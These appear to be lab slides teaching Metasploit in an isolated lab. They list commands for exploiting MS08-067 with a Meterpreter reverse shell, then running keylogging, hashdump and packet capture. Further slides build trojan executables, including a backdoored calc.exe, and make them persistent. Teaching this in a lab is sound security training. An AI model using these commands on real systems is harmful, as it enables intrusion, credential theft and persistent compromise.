Introduction to Metasploit Marian Novotny ################################################################### Outline ################################################################### Laboratory Set-up Introduction to Metasploit Exploiting MS 08-67 Metrpreter Building trojan ################################################################### Laboratory Set-up ################################################################### victim Win XP SP2 English IP: 192.168.0.2, shared folder c:\share wireshark, procmon BackTrack 5 R3 KDE user:root, password: toor startx ifconfig eth0 192.168.0.3 netmask 255.255.255.0 ping 192.168.0.2 ################################################################### Metasploit Terminology ################################################################### vulnerability, exploit payload, shellcode tools MSFpayload, MSFencode modules Exploits, Auxiliaries, Payloads, Encoders, Nops interfaces msfconsole, msfcli http://www.offensive-security.com/metasploit-unleashed/Main_Page ################################################################### CVE-2008-4250 - MS 08-67 ################################################################### used by Conficker worm for propagation vulnerability MS06-040 in the same code http://www.phreedom.org/blog/2008/decompiling-ms08-067/ \path\..\..\AAAAAAAAAAAAAAAAAAAAAAAAA accesible via Server Service RPC interface nmap --script=smb-check-vulns 192.168.0.2 ################################################################### Information gathering ################################################################### We need to know OS version use auxiliary/scanner/smb/smb_version show options set RHOSTS 192.168.0.2 run ################################################################### Eploitation ################################################################### search ms08 use exploit/windows/smb/ms08_067_netapi show options set RHOST 192.168.0.2 show targets set target 4 show payloads set payload windows/meterpreter/reverse_tcp show options set LHOST 192.168.0.3 exploit netstat -a ################################################################### Meterpreter ################################################################### filesystem, OS cd, pwd, ls, ps, migrate, execute -f calc.exe sysinfo, getuid, download calc.exe capturing screenshot, run post/windows/capture/keylog_recorder run post/windows/gather/hashdump run packetrecorder -i 1 ################################################################### Buidling a simple trojan ################################################################### msfpayload windows/meterpreter/reverse_tcp O msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 X > /root/devil.exe use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.3 exploit ################################################################### Buidling a devil calc ################################################################### msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 R | msfencode -t exe -x /root/calc.exe -o /root/devilCalc.exe -k -c 5 use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.3 exploit ################################################################### Making a trojan persistent ################################################################### ps migrate run persistence -X -i 50 -p 4444 -r 192.168.0.3